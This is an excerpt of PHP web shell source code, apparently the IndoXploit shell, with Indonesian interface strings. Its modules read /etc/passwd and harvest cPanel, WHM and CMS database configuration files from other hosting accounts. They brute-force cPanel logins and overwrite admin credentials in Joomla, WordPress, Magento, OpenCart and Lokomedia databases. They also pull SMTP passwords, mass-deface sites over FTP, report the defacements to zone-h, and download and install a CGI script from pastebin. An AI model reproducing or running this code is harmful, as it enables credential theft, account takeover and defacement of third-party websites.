symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-Opencart.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/settings.inc.php',$sitess.'-Prestashop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/lokomedia/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/slconfig.php',$sitess.'-Sitelock.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/application/config/database.php',$sitess.'-Ellislab.txt');
}
print "Location: ./\n\n";"; 604 | $file = "idx_config/vhost.cin"; 605 | $handle = fopen($file ,"w+"); 606 | fwrite($handle ,base64_decode($vhost)); 607 | fclose($handle); 608 | chmod($file, 0755); 609 | if(exe("cd idx_config && ./vhost.cin")) { 610 | echo "
Done
"; 611 | } else { 612 | echo "
Done
"; 613 | } 614 | 615 | } else { 616 | $etc = fopen("/etc/passwd", "r") or die("
Can't read /etc/passwd
"); 617 | while($passwd = fgets($etc)) { 618 | if($passwd == "" || !$etc) { 619 | echo "Can't read /etc/passwd"; 620 | } else { 621 | preg_match_all('/(.*?):x:/', $passwd, $user_config); 622 | foreach($user_config[1] as $user_idx) { 623 | $user_config_dir = "/home/$user_idx/public_html/"; 624 | if(is_readable($user_config_dir)) { 625 | $grab_config = array( 626 | "/home/$user_idx/.my.cnf" => "cpanel", 627 | "/home/$user_idx/.accesshash" => "WHM-accesshash", 628 | "$user_config_dir/po-content/config.php" => "Popoji", 629 | "$user_config_dir/vdo_config.php" => "Voodoo", 630 | "$user_config_dir/bw-configs/config.ini" => "BosWeb", 631 | "$user_config_dir/config/koneksi.php" => "Lokomedia", 632 | "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia", 633 | "$user_config_dir/clientarea/configuration.php" => "WHMCS", 634 | "$user_config_dir/whm/configuration.php" => "WHMCS", 635 | "$user_config_dir/whmcs/configuration.php" => "WHMCS", 636 | "$user_config_dir/forum/config.php" => "phpBB", 637 | "$user_config_dir/sites/default/settings.php" => "Drupal", 638 | "$user_config_dir/config/settings.inc.php" => "PrestaShop", 639 | "$user_config_dir/app/etc/local.xml" => "Magento", 640 | "$user_config_dir/joomla/configuration.php" => "Joomla", 641 | "$user_config_dir/configuration.php" => "Joomla", 642 | "$user_config_dir/wp/wp-config.php" => "WordPress", 643 | "$user_config_dir/wordpress/wp-config.php" => "WordPress", 644 | "$user_config_dir/wp-config.php" => "WordPress", 645 | "$user_config_dir/admin/config.php" => "OpenCart", 646 | "$user_config_dir/slconfig.php" => "Sitelok", 647 | "$user_config_dir/application/config/database.php" => "Ellislab"); 648 | foreach($grab_config as $config => $nama_config) { 649 | $ambil_config = file_get_contents($config); 650 | if($ambil_config == '') { 651 | } else { 652 | $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w"); 653 | fputs($file_config,$ambil_config); 654 | } 655 | } 656 | } 657 | } 658 | } 659 | } 660 | echo "
Done
"; 661 | } 662 | } elseif($_GET['do'] == 'jumping') { 663 | $i = 0; 664 | echo "
"; 665 | if(preg_match("/hsphere/", $dir)) { 666 | $urls = explode("\r\n", $_POST['url']); 667 | if(isset($_POST['jump'])) { 668 | echo "
";
 669 | 			foreach($urls as $url) {
 670 | 				$url = str_replace(array("http://","www."), "", strtolower($url));
 671 | 				$etc = "/etc/passwd";
 672 | 				$f = fopen($etc,"r");
 673 | 				while($gets = fgets($f)) {
 674 | 					$pecah = explode(":", $gets);
 675 | 					$user = $pecah[0];
 676 | 					$dir_user = "/hsphere/local/home/$user";
 677 | 					if(is_dir($dir_user) === true) {
 678 | 						$url_user = $dir_user."/".$url;
 679 | 						if(is_readable($url_user)) {
 680 | 							$i++;
 681 | 							$jrw = "[R] $url_user";
 682 | 							if(is_writable($url_user)) {
 683 | 								$jrw = "[RW] $url_user";
 684 | 							}
 685 | 							echo $jrw."
"; 686 | } 687 | } 688 | } 689 | } 690 | if($i == 0) { 691 | } else { 692 | echo "
Total ada ".$i." Kamar di ".$ip; 693 | } 694 | echo "
"; 695 | } else { 696 | echo '
697 |
698 | List Domains:
699 |
705 | 706 |
'; 707 | } 708 | } elseif(preg_match("/vhosts|vhost/", $dir)) { 709 | preg_match("/\/var\/www\/(.*?)\//", $dir, $vh); 710 | $urls = explode("\r\n", $_POST['url']); 711 | if(isset($_POST['jump'])) { 712 | echo "
";
 713 | 			foreach($urls as $url) {
 714 | 				$url = str_replace("www.", "", $url);
 715 | 				$web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
 716 | 				if(is_dir($web_vh) === true) {
 717 | 					if(is_readable($web_vh)) {
 718 | 						$i++;
 719 | 						$jrw = "[R] $web_vh";
 720 | 						if(is_writable($web_vh)) {
 721 | 							$jrw = "[RW] $web_vh";
 722 | 						}
 723 | 						echo $jrw."
"; 724 | } 725 | } 726 | } 727 | if($i == 0) { 728 | } else { 729 | echo "
Total ada ".$i." Kamar di ".$ip; 730 | } 731 | echo "
"; 732 | } else { 733 | echo '
734 |
735 | List Domains:
736 |
739 | 740 |
'; 741 | } 742 | } else { 743 | echo "
";
 744 | 		$etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd");
 745 | 		while($passwd = fgets($etc)) {
 746 | 			if($passwd == '' || !$etc) {
 747 | 				echo "Can't read /etc/passwd";
 748 | 			} else {
 749 | 				preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
 750 | 				foreach($user_jumping[1] as $user_idx_jump) {
 751 | 					$user_jumping_dir = "/home/$user_idx_jump/public_html";
 752 | 					if(is_readable($user_jumping_dir)) {
 753 | 						$i++;
 754 | 						$jrw = "[R] $user_jumping_dir";
 755 | 						if(is_writable($user_jumping_dir)) {
 756 | 							$jrw = "[RW] $user_jumping_dir";
 757 | 						}
 758 | 						echo $jrw;
 759 | 						if(function_exists('posix_getpwuid')) {
 760 | 							$domain_jump = file_get_contents("/etc/named.conf");	
 761 | 							if($domain_jump == '') {
 762 | 								echo " => ( gabisa ambil nama domain nya )
"; 763 | } else { 764 | preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); 765 | foreach($domains_jump[1] as $dj) { 766 | $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); 767 | $user_jumping_url = $user_jumping_url['name']; 768 | if($user_jumping_url == $user_idx_jump) { 769 | echo " => ( $dj )
"; 770 | break; 771 | } 772 | } 773 | } 774 | } else { 775 | echo "
"; 776 | } 777 | } 778 | } 779 | } 780 | } 781 | if($i == 0) { 782 | } else { 783 | echo "
Total ada ".$i." Kamar di ".$ip; 784 | } 785 | echo "
"; 786 | } 787 | echo "
"; 788 | } elseif($_GET['do'] == 'auto_edit_user') { 789 | if($_POST['hajar']) { 790 | if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) { 791 | echo "username atau password harus lebih dari 6 karakter"; 792 | } else { 793 | $user_baru = $_POST['user_baru']; 794 | $pass_baru = md5($_POST['pass_baru']); 795 | $conf = $_POST['config_dir']; 796 | $scan_conf = scandir($conf); 797 | foreach($scan_conf as $file_conf) { 798 | if(!is_file("$conf/$file_conf")) continue; 799 | $config = file_get_contents("$conf/$file_conf"); 800 | if(preg_match("/JConfig|joomla/",$config)) { 801 | $dbhost = ambilkata($config,"host = '","'"); 802 | $dbuser = ambilkata($config,"user = '","'"); 803 | $dbpass = ambilkata($config,"password = '","'"); 804 | $dbname = ambilkata($config,"db = '","'"); 805 | $dbprefix = ambilkata($config,"dbprefix = '","'"); 806 | $prefix = $dbprefix."users"; 807 | $conn = mysql_connect($dbhost,$dbuser,$dbpass); 808 | $db = mysql_select_db($dbname); 809 | $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); 810 | $result = mysql_fetch_array($q); 811 | $id = $result['id']; 812 | $site = ambilkata($config,"sitename = '","'"); 813 | $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); 814 | echo "Config => ".$file_conf."
"; 815 | echo "CMS => Joomla
"; 816 | if($site == '') { 817 | echo "Sitename => error, gabisa ambil nama domain nya
"; 818 | } else { 819 | echo "Sitename => $site
"; 820 | } 821 | if(!$update OR !$conn OR !$db) { 822 | echo "Status => ".mysql_error()."

"; 823 | } else { 824 | echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; 825 | } 826 | mysql_close($conn); 827 | } elseif(preg_match("/WordPress/",$config)) { 828 | $dbhost = ambilkata($config,"DB_HOST', '","'"); 829 | $dbuser = ambilkata($config,"DB_USER', '","'"); 830 | $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); 831 | $dbname = ambilkata($config,"DB_NAME', '","'"); 832 | $dbprefix = ambilkata($config,"table_prefix = '","'"); 833 | $prefix = $dbprefix."users"; 834 | $option = $dbprefix."options"; 835 | $conn = mysql_connect($dbhost,$dbuser,$dbpass); 836 | $db = mysql_select_db($dbname); 837 | $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); 838 | $result = mysql_fetch_array($q); 839 | $id = $result[ID]; 840 | $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); 841 | $result2 = mysql_fetch_array($q2); 842 | $target = $result2[option_value]; 843 | if($target == '') { 844 | $url_target = "Login => error, gabisa ambil nama domain nyaa
"; 845 | } else { 846 | $url_target = "Login => $target/wp-login.php
"; 847 | } 848 | $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); 849 | echo "Config => ".$file_conf."
"; 850 | echo "CMS => Wordpress
"; 851 | echo $url_target; 852 | if(!$update OR !$conn OR !$db) { 853 | echo "Status => ".mysql_error()."

"; 854 | } else { 855 | echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; 856 | } 857 | mysql_close($conn); 858 | } elseif(preg_match("/Magento|Mage_Core/",$config)) { 859 | $dbhost = ambilkata($config,""); 860 | $dbuser = ambilkata($config,""); 861 | $dbpass = ambilkata($config,""); 862 | $dbname = ambilkata($config,""); 863 | $dbprefix = ambilkata($config,""); 864 | $prefix = $dbprefix."admin_user"; 865 | $option = $dbprefix."core_config_data"; 866 | $conn = mysql_connect($dbhost,$dbuser,$dbpass); 867 | $db = mysql_select_db($dbname); 868 | $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); 869 | $result = mysql_fetch_array($q); 870 | $id = $result[user_id]; 871 | $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); 872 | $result2 = mysql_fetch_array($q2); 873 | $target = $result2[value]; 874 | if($target == '') { 875 | $url_target = "Login => error, gabisa ambil nama domain nyaa
"; 876 | } else { 877 | $url_target = "Login => $target/admin/
"; 878 | } 879 | $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); 880 | echo "Config => ".$file_conf."
"; 881 | echo "CMS => Magento
"; 882 | echo $url_target; 883 | if(!$update OR !$conn OR !$db) { 884 | echo "Status => ".mysql_error()."

"; 885 | } else { 886 | echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; 887 | } 888 | mysql_close($conn); 889 | } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { 890 | $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); 891 | $dbuser = ambilkata($config,"'DB_USERNAME', '","'"); 892 | $dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); 893 | $dbname = ambilkata($config,"'DB_DATABASE', '","'"); 894 | $dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); 895 | $prefix = $dbprefix."user"; 896 | $conn = mysql_connect($dbhost,$dbuser,$dbpass); 897 | $db = mysql_select_db($dbname); 898 | $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); 899 | $result = mysql_fetch_array($q); 900 | $id = $result[user_id]; 901 | $target = ambilkata($config,"HTTP_SERVER', '","'"); 902 | if($target == '') { 903 | $url_target = "Login => error, gabisa ambil nama domain nyaa
"; 904 | } else { 905 | $url_target = "Login => $target
"; 906 | } 907 | $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); 908 | echo "Config => ".$file_conf."
"; 909 | echo "CMS => OpenCart
"; 910 | echo $url_target; 911 | if(!$update OR !$conn OR !$db) { 912 | echo "Status => ".mysql_error()."

"; 913 | } else { 914 | echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; 915 | } 916 | mysql_close($conn); 917 | } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { 918 | $dbhost = ambilkata($config,'server = "','"'); 919 | $dbuser = ambilkata($config,'username = "','"'); 920 | $dbpass = ambilkata($config,'password = "','"'); 921 | $dbname = ambilkata($config,'database = "','"'); 922 | $prefix = "users"; 923 | $option = "identitas"; 924 | $conn = mysql_connect($dbhost,$dbuser,$dbpass); 925 | $db = mysql_select_db($dbname); 926 | $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); 927 | $result = mysql_fetch_array($q); 928 | $target = $result[alamat_website]; 929 | if($target == '') { 930 | $target2 = $result[url]; 931 | $url_target = "Login => error, gabisa ambil nama domain nyaa
"; 932 | if($target2 == '') { 933 | $url_target2 = "Login => error, gabisa ambil nama domain nyaa
"; 934 | } else { 935 | $cek_login3 = file_get_contents("$target2/adminweb/"); 936 | $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); 937 | if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { 938 | $url_target2 = "Login => $target2/adminweb
"; 939 | } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { 940 | $url_target2 = "Login => $target2/lokomedia/adminweb
"; 941 | } else { 942 | $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
"; 943 | } 944 | } 945 | } else { 946 | $cek_login = file_get_contents("$target/adminweb/"); 947 | $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); 948 | if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { 949 | $url_target = "Login => $target/adminweb
"; 950 | } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { 951 | $url_target = "Login => $target/lokomedia/adminweb
"; 952 | } else { 953 | $url_target = "Login => $target [ gatau admin login nya dimana :p ]
"; 954 | } 955 | } 956 | $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); 957 | echo "Config => ".$file_conf."
"; 958 | echo "CMS => Lokomedia
"; 959 | if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) { 960 | echo $url_target2; 961 | } else { 962 | echo $url_target; 963 | } 964 | if(!$update OR !$conn OR !$db) { 965 | echo "Status => ".mysql_error()."

"; 966 | } else { 967 | echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; 968 | } 969 | mysql_close($conn); 970 | } 971 | } 972 | } 973 | } else { 974 | echo "
975 |

Auto Edit User Config

976 |
977 | DIR Config:
978 |

979 | Set User & Pass:
980 |
981 |
982 | 983 |
984 | NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
985 | "; 986 | } 987 | } elseif($_GET['do'] == 'cpanel') { 988 | if($_POST['crack']) { 989 | $usercp = explode("\r\n", $_POST['user_cp']); 990 | $passcp = explode("\r\n", $_POST['pass_cp']); 991 | $i = 0; 992 | foreach($usercp as $ucp) { 993 | foreach($passcp as $pcp) { 994 | if(@mysql_connect('localhost', $ucp, $pcp)) { 995 | if($_SESSION[$ucp] && $_SESSION[$pcp]) { 996 | } else { 997 | $_SESSION[$ucp] = "1"; 998 | $_SESSION[$pcp] = "1"; 999 | if($ucp == '' || $pcp == '') { 1000 | 1001 | } else { 1002 | $i++; 1003 | if(function_exists('posix_getpwuid')) { 1004 | $domain_cp = file_get_contents("/etc/named.conf"); 1005 | if($domain_cp == '') { 1006 | $dom = "gabisa ambil nama domain nya"; 1007 | } else { 1008 | preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp); 1009 | foreach($domains_cp[1] as $dj) { 1010 | $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); 1011 | $user_cp_url = $user_cp_url['name']; 1012 | if($user_cp_url == $ucp) { 1013 | $dom = "$dj"; 1014 | break; 1015 | } 1016 | } 1017 | } 1018 | } else { 1019 | $dom = "function is Disable by system"; 1020 | } 1021 | echo "username ($ucp) password ($pcp) domain ($dom)
"; 1022 | } 1023 | } 1024 | } 1025 | } 1026 | } 1027 | if($i == 0) { 1028 | } else { 1029 | echo "
sukses nyolong ".$i." Cpanel by IndoXploit."; 1030 | } 1031 | } else { 1032 | echo "
1033 |
1034 | USER:
1035 |
1050 | PASS:
1051 |
1085 | 1086 |
1087 | NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; 1088 | } 1089 | } elseif($_GET['do'] == 'cpftp_auto') { 1090 | if($_POST['crack']) { 1091 | $usercp = explode("\r\n", $_POST['user_cp']); 1092 | $passcp = explode("\r\n", $_POST['pass_cp']); 1093 | $i = 0; 1094 | foreach($usercp as $ucp) { 1095 | foreach($passcp as $pcp) { 1096 | if(@mysql_connect('localhost', $ucp, $pcp)) { 1097 | if($_SESSION[$ucp] && $_SESSION[$pcp]) { 1098 | } else { 1099 | $_SESSION[$ucp] = "1"; 1100 | $_SESSION[$pcp] = "1"; 1101 | if($ucp == '' || $pcp == '') { 1102 | // 1103 | } else { 1104 | echo "[+] username ($ucp) password ($pcp)
"; 1105 | $ftp_conn = ftp_connect($ip); 1106 | $ftp_login = ftp_login($ftp_conn, $ucp, $pcp); 1107 | if((!$ftp_login) || (!$ftp_conn)) { 1108 | echo "[+] Login Gagal

"; 1109 | } else { 1110 | echo "[+] Login Sukses
"; 1111 | $fi = htmlspecialchars($_POST['file_deface']); 1112 | $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY); 1113 | if($deface) { 1114 | $i++; 1115 | echo "[+] Deface Sukses
"; 1116 | if(function_exists('posix_getpwuid')) { 1117 | $domain_cp = file_get_contents("/etc/named.conf"); 1118 | if($domain_cp == '') { 1119 | echo "[+] gabisa ambil nama domain nya

"; 1120 | } else { 1121 | preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp); 1122 | foreach($domains_cp[1] as $dj) { 1123 | $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); 1124 | $user_cp_url = $user_cp_url['name']; 1125 | if($user_cp_url == $ucp) { 1126 | echo "[+] http://$dj/$fi

"; 1127 | break; 1128 | } 1129 | } 1130 | } 1131 | } else { 1132 | echo "[+] gabisa ambil nama domain nya

"; 1133 | } 1134 | } else { 1135 | echo "[-] Deface Gagal

"; 1136 | } 1137 | } 1138 | //echo "username ($ucp) password ($pcp)
"; 1139 | } 1140 | } 1141 | } 1142 | } 1143 | } 1144 | if($i == 0) { 1145 | } else { 1146 | echo "
sukses deface ".$i." Cpanel by IndoXploit."; 1147 | } 1148 | } else { 1149 | echo "
1150 |
1151 | Filename:
1152 |
1153 | Deface Page:
1154 |
1155 | USER:
1156 |
1171 | PASS:
1172 |
1204 | 1205 |
1206 | NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; 1207 | } 1208 | } elseif($_GET['do'] == 'smtp') { 1209 | echo "
NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

"; 1210 | function scj($dir) { 1211 | $dira = scandir($dir); 1212 | foreach($dira as $dirb) { 1213 | if(!is_file("$dir/$dirb")) continue; 1214 | $ambil = file_get_contents("$dir/$dirb"); 1215 | $ambil = str_replace("$", "", $ambil); 1216 | if(preg_match("/JConfig|joomla/", $ambil)) { 1217 | $smtp_host = ambilkata($ambil,"smtphost = '","'"); 1218 | $smtp_auth = ambilkata($ambil,"smtpauth = '","'"); 1219 | $smtp_user = ambilkata($ambil,"smtpuser = '","'"); 1220 | $smtp_pass = ambilkata($ambil,"smtppass = '","'"); 1221 | $smtp_port = ambilkata($ambil,"smtpport = '","'"); 1222 | $smtp_secure = ambilkata($ambil,"smtpsecure = '","'"); 1223 | echo "SMTP Host: $smtp_host
"; 1224 | echo "SMTP port: $smtp_port
"; 1225 | echo "SMTP user: $smtp_user
"; 1226 | echo "SMTP pass: $smtp_pass
"; 1227 | echo "SMTP auth: $smtp_auth
"; 1228 | echo "SMTP secure: $smtp_secure

"; 1229 | } 1230 | } 1231 | } 1232 | $smpt_hunter = scj($dir); 1233 | echo $smpt_hunter; 1234 | } elseif($_GET['do'] == 'auto_wp') { 1235 | if($_POST['hajar']) { 1236 | $title = htmlspecialchars($_POST['new_title']); 1237 | $pn_title = str_replace(" ", "-", $title); 1238 | if($_POST['cek_edit'] == "Y") { 1239 | $script = $_POST['edit_content']; 1240 | } else { 1241 | $script = $title; 1242 | } 1243 | $conf = $_POST['config_dir']; 1244 | $scan_conf = scandir($conf); 1245 | foreach($scan_conf as $file_conf) { 1246 | if(!is_file("$conf/$file_conf")) continue; 1247 | $config = file_get_contents("$conf/$file_conf"); 1248 | if(preg_match("/WordPress/", $config)) { 1249 | $dbhost = ambilkata($config,"DB_HOST', '","'"); 1250 | $dbuser = ambilkata($config,"DB_USER', '","'"); 1251 | $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); 1252 | $dbname = ambilkata($config,"DB_NAME', '","'"); 1253 | $dbprefix = ambilkata($config,"table_prefix = '","'"); 1254 | $prefix = $dbprefix."posts"; 1255 | $option = $dbprefix."options"; 1256 | $conn = mysql_connect($dbhost,$dbuser,$dbpass); 1257 | $db = mysql_select_db($dbname); 1258 | $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC"); 1259 | $result = mysql_fetch_array($q); 1260 | $id = $result[ID]; 1261 | $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); 1262 | $result2 = mysql_fetch_array($q2); 1263 | $target = $result2[option_value]; 1264 | $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'"); 1265 | $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'"); 1266 | echo "
"; 1267 | if($target == '') { 1268 | echo "URL: error, gabisa ambil nama domain nya -> "; 1269 | } else { 1270 | echo "URL: $target/?p=$id -> "; 1271 | } 1272 | if(!$update OR !$conn OR !$db) { 1273 | echo "MySQL Error: ".mysql_error()."
"; 1274 | } else { 1275 | echo "sukses di ganti.
"; 1276 | } 1277 | echo "
"; 1278 | mysql_close($conn); 1279 | } 1280 | } 1281 | } else { 1282 | echo "
1283 |

Auto Edit Title+Content WordPress

1284 |
1285 | DIR Config:
1286 |

1287 | Set Title:
1288 |

1289 | Edit Content?: YN
1290 | Jika pilih Y masukin script defacemu ( saran yang simple aja ), kalo pilih N gausah di isi.
1291 |
1292 |
1293 |
1294 | NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
1295 | "; 1296 | } 1297 | } elseif($_GET['do'] == 'zoneh') { 1298 | if($_POST['submit']) { 1299 | $domain = explode("\r\n", $_POST['url']); 1300 | $nick = $_POST['nick']; 1301 | echo "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0
"; 1302 | echo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick

"; 1303 | function zoneh($url,$nick) { 1304 | $ch = curl_init("http://www.zone-h.com/notify/single"); 1305 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 1306 | curl_setopt($ch, CURLOPT_POST, true); 1307 | curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send"); 1308 | return curl_exec($ch); 1309 | curl_close($ch); 1310 | } 1311 | foreach($domain as $url) { 1312 | $zoneh = zoneh($url,$nick); 1313 | if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) { 1314 | echo "$url -> OK
"; 1315 | } else { 1316 | echo "$url -> ERROR
"; 1317 | } 1318 | } 1319 | } else { 1320 | echo "
1321 | Defacer:
1322 |
1323 | Domains:
1324 |
1325 | 1326 |
"; 1327 | } 1328 | echo "
"; 1329 | } elseif($_GET['do'] == 'cgi') { 1330 | $cgi_dir = mkdir('idx_cgi', 0755); 1331 | $file_cgi = "idx_cgi/cgi.izo"; 1332 | $isi_htcgi = "AddHandler cgi-script .izo"; 1333 | $htcgi = fopen(".htaccess", "w"); 1334 | fwrite($htcgi, $isi_htcgi); 1335 | fclose($htcgi); 1336 | $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT"); 1337 | $cgi = fopen($file_cgi, "w"); 1338 | fwrite($cgi, $cgi_script); 1339 | fclose($cgi); 1340 | chmod($file_cgi, 0755); 1341 | echo ""; 1342 | } elseif($_GET['do'] == 'fake_root') { 1343 | ob_start(); 1344 | $cwd = getcwd(); 1345 | $ambil_user = explode("/", $cwd); 1346 | $user = $ambil_user[2]; 1347 | if($_POST['reverse']) { 1348 | $site = explode("\r\n", $_POST['url']); 1349 | $file = $_POST['file']; 1350 | foreach($site as $url) { 1351 | $cek = getsource("$url/~$user/$file"); 1352 | if(preg_match("/hacked/i", $cek)) { 1353 | echo "URL: $url/~$user/$file -> Fake Root!
"; 1354 | } 1355 | } 1356 | } else { 1357 | echo "
1358 | Filename:

1359 | User:

1360 | Domain:
1361 |
1364 | 1365 |

1366 | NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.
"; 1367 | } 1368 | } elseif($_GET['do'] == 'adminer') { 1369 | $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); 1370 | function adminer($url, $isi) { 1371 | $fp = fopen($isi, "w"); 1372 | $ch = curl_init(); 1373 | curl_setopt($ch, CURLOPT_URL, $url); 1374 | curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); 1375 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 1376 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 1377 | curl_setopt($ch, CURLOPT_FILE, $fp); 1378 | return curl_exec($ch); 1379 | curl_close($ch); 1380 | fclose($fp); 1381 | ob_flush(); 1382 | flush(); 1383 | } 1384 | if(file_exists('adminer.php')) { 1385 | echo "
-> adminer login <-
"; 1386 | } else { 1387 | if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) { 1388 | echo "
-> adminer login <-
"; 1389 | } else { 1390 | echo "
gagal buat file adminer
"; 1391 | } 1392 | } 1393 | } elseif($_GET['do'] == 'auto_dwp') { 1394 | if($_POST['auto_deface_wp']) { 1395 | function anucurl($sites) { 1396 | $ch = curl_init($sites); 1397 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 1398 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 1399 | curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); 1400 | curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); 1401 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 1402 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 1403 | curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); 1404 | curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); 1405 | curl_setopt($ch, CURLOPT_COOKIESESSION, true); 1406 | $data = curl_exec($ch); 1407 | curl_close($ch); 1408 | return $data; 1409 | } 1410 | function lohgin($cek, $web, $userr, $pass, $wp_submit) { 1411 | $post = array( 1412 | "log" => "$userr", 1413 | "pwd" => "$pass", 1414 | "rememberme" => "forever", 1415 | "wp-submit" => "$wp_submit", 1416 | "redirect_to" => "$web", 1417 | "testcookie" => "1", 1418 | ); 1419 | $ch = curl_init($cek); 1420 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 1421 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 1422 | curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); 1423 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 1424 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 1425 | curl_setopt($ch, CURLOPT_POST, 1); 1426 | curl_setopt($ch, CURLOPT_POSTFIELDS, $post); 1427 | curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); 1428 | curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); 1429 | curl_setopt($ch, CURLOPT_COOKIESESSION, true); 1430 | $data = curl_exec($ch); 1431 | curl_close($ch); 1432 | return $data; 1433 | } 1434 | $scan = $_POST['link_config']; 1435 | $link_config = scandir($scan); 1436 | $script = htmlspecialchars($_POST['script']); 1437 | $user = "indoxploit"; 1438 | $pass = "indoxploit"; 1439 | $passx = md5($pass); 1440 | foreach($link_config as $dir_config) { 1441 | if(!is_file("$scan/$dir_config")) continue; 1442 | $config = file_get_contents("$scan/$dir_config"); 1443 | if(preg_match("/WordPress/", $config)) { 1444 | $dbhost = ambilkata($config,"DB_HOST', '","'"); 1445 | $dbuser = ambilkata($config,"DB_USER', '","'"); 1446 | $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); 1447 | $dbname = ambilkata($config,"DB_NAME', '","'"); 1448 | $dbprefix = ambilkata($config,"table_prefix = '","'"); 1449 | $prefix = 